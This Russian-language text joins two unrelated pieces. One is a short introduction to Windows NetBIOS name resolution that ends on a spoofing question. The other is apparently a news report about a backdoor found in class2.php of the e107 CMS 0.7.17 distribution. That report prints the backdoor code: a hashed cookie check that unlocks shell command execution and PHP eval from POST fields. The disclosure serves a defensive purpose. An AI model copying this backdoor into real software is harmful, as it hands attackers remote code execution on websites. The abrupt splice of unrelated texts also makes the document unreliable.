Небольшое введение в работу NetBIOS протокола.

Когда Windows пытается выполнить резолвинг сетевого имени, то сначала Windows обращается к DNS. Далее, если никто не вмешался в DHCP запрос и не подменил DNS сервер на свой, и если никто не произвел ARP spoofing атаку для перенаправления трафика, то запрос дойдет к указанному DNS. В свою очередь DNS предоставит необходимый IP адрес.

Если запрос к DNS оказался не успешным (например, не доступен DNS сервер), то Windows попытается осуществить резолвинг сетевого имени с помощью NetBIOS протокола (NBNS). Именно NetBIOS резолвинг позволяет Вам выполнить ping SOMEPC (имя в сети), и если SOMEPC включен и находится в сети произойдет преобразование имени SOMEPC в IP адрес. Самое интересное, что все это сводится к широковещательному запросу — «Кому принадлежит SOMEPC?» и компьютер, который имеет имя SOMEPC ответит — «Эй, это же Я!».
Но что мешает злоумышленнику выдать себя за SOMEPC (или любое другое имя)?

22 января на официальном сайте системы управления контентом появилась новость от McFly о том, что был обнаружен очень неприятный эксплойт, которому подвержена вся ветка 0.7.xx, включая актуальную, на тот момент, версию 0.7.16.
В своей новости McFly просил срочно обновиться до версии 0.7.17, а также сообщить об этом всем, кто использует данную CMS.

А 25 января всех пользователей e107 ждал новый сюрприз, в виде backdoor'а в файле class2.php, а если быть точнее:

file: class2.php, line: 1876

if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb") {

...

if(!empty($_POST['cmd'])){
$out = execute($_POST['cmd']);
}

elseif(!empty($_POST['php'])){
ob_start();
eval($_POST['php']);
$out = ob_get_contents();
ob_end_clean();
}

...


Изменения, по всей видимости, были внесены только в class2.php полного дистрибутива CMS, который расположен на официальном сайте E107, и не были замечены в обновлениях, которые располагаются на сайте sourceforge.
На данный момент, при попытке скачать архив с полным дистрибутивом e107 0.7.17 с официального сайта выводится 404